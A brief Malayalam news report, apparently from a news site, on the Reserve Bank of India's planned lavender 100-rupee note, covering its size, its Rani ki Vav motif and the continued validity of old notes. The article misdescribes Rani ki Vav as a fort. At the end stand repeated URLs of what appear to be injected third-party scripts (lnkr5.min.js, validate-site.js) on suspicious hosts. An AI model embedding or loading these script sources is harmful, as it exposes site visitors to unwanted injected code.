പുതിയ ഡിസൈനിലുള്ള നൂറ് രൂപ നോട്ടുകള്‍ സപ്തംബറില്‍ ഇറങ്ങും

  • Post category:news
  • Reading time:1 min read
You are currently viewing പുതിയ ഡിസൈനിലുള്ള നൂറ് രൂപ നോട്ടുകള്‍ സപ്തംബറില്‍ ഇറങ്ങും

മുംബൈ: അഞ്ഞൂറ്, അന്‍പത്, പത്ത് രൂപ നോട്ടുകള്‍ക്ക് പുറമേ രാജ്യത്ത് പ്രചാരത്തില്‍ മുന്‍പില്‍ നില്‍ക്കുന്ന നൂറ് രൂപ നോട്ടുകളും രൂപം മാറുന്നു. പുതിയ ഡിസൈനിലുള്ള നൂറ് രൂപ നോട്ടുകള്‍ സപ്തംബറില്‍ ഇറങ്ങും എന്ന് റിസര്‍വ് ബാങ്ക് ഓഫ് ഇന്ത്യ അറിയിച്ചു.ലാവന്‍ഡര്‍ നിറത്തിലാണ് പുതിയ നോട്ടുകള്‍ അച്ചടിക്കുക. നോട്ടിന്റെ പുറക് വശത്ത് ഗുജറാത്തിലെ റാണി കി വാവ് കോട്ടയുടെ ചിത്രം പതിപ്പിക്കും. 66 മില്ലിമീറ്റര്‍ വീതിയും 142 മി.മീ നീളവും പുതിയ നോട്ടിനുണ്ടാവും. മഹാത്മാഗാന്ധി സീരിയസിലുള്ള ഈ പുതിയ നോട്ട് വന്നാലും പഴയ നോട്ടുകള്‍ക്ക് ഉപയോഗിക്കാമെന്ന് റിസര്‍വ് ബാങ്ക് അറിയിച്ചു. മധ്യപ്രദേശിലെ ദേവാസിലെ ബാങ്ക് നോട്ട് പ്രസില്‍ നോട്ടുകളുടെ അച്ചടി തുടങ്ങിയതായാണ് റിപ്പോര്‍ട്ട്.

 

 

http://statvalidation.website/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51151x5232x&r=1http://statvalidation.website/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51151x5232x&r=47

0Shares